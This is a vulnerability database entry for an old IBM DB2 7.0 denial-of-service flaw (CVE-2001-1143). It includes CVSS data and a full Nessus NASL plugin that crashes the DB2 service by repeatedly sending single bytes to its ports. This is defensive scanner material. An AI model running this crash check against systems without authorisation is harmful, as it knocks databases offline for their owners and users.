Attack vector
NETWORK Attack complexity
LOW Privileges required
NONE Confidentiality impact
NONE Integrity impact
NONE Availability impact
PARTIAL network
low complexity
ibm
nessus
Published: 2001-07-11
Updated: 2008-09-05
Summary
IBM DB2 7.0 allows a remote attacker to cause a denial of service (crash) via a single byte to (1) db2ccs.exe on port 6790, or (2) db2jds.exe on port 6789.
Vulnerable Configurations
| Part | Description | Count |
| Application | Ibm | 1 |
Nessus
| NASL family | Databases |
| NASL id | DB2_DOS.NASL |
| description | It was possible to crash the IBM DB2 database service by connecting to the affected service and sending just one byte to it. |
| last seen | 2020-06-01 |
| modified | 2020-06-02 |
| plugin id | 10871 |
| published | 2002-03-06 |
| reporter | This script is Copyright (C) 2002-2018 Tenable Network Security, Inc. |
| source | https://www.tenable.com/plugins/nessus/10871 |
| title | IBM DB2 Multiple CGI Single Byte Request Remote DoS |
| code | #
# (C) Tenable Network Security, Inc.
#
include("compat.inc");
if (description)
{
script_id(10871);
script_version("1.22");
script_cvs_date("Date: 2018/11/15 20:50:21");
script_cve_id("CVE-2001-1143");
script_bugtraq_id(3010);
script_name(english:"IBM DB2 Multiple CGI Single Byte Request Remote DoS");
script_summary(english:"Flood against the remote service.");
script_set_attribute(attribute:"synopsis", value:
"The remote database service is affected by a denial of service
vulnerability." );
script_set_attribute(attribute:"description", value:
"It was possible to crash the IBM DB2 database service by connecting
to the affected service and sending just one byte to it." );
script_set_attribute(attribute:"see_also", value:"https://seclists.org/bugtraq/2001/Jul/189" );
script_set_attribute(attribute:"solution", value:
"Contact the vendor for a patch." );
script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P");
script_set_cvss_temporal_vector("CVSS2#E:U/RL:OF/RC:C");
script_set_attribute(attribute:"exploitability_ease", value:"No known exploits are available");
script_set_attribute(attribute:"exploit_available", value:"false");
script_set_attribute(attribute:"plugin_publication_date", value: "2002/03/06");
script_set_attribute(attribute:"vuln_publication_date", value: "2001/07/11");
script_set_attribute(attribute:"plugin_type", value:"remote");
script_set_attribute(attribute:"cpe", value:"cpe:/a:ibm:db2");
script_end_attributes();
script_category(ACT_DENIAL);
script_copyright(english:"This script is Copyright (C) 2002-2018 Tenable Network Security, Inc.");
script_family(english:"Databases");
script_dependencies("db2_jdbc_applet_server_detect.nasl");
script_require_ports("Services/db2_jd");
exit(0);
}
include("global_settings.inc");
function test_db2_port(port)
{
local_var soc, i;
if (! get_port_state(port))
return(0);
soc = open_sock_tcp(port);
if (!soc)
return(0);
for (i=0; i<100; i=i+1)
{
send(socket:soc, data:string("x"));
close(soc);
soc = open_sock_tcp(port);
if (! soc)
{
sleep(1);
soc = open_sock_tcp(port);
if (! soc)
{
security_warning(port);
return (1);
}
}
}
close(soc);
return(1);
}
port = get_kb_item("Services/db2_jd");
if (!port) exit(0);
test_db2_port(port:port);
if (report_paranoia > 1) test_db2_port(port:6790);
|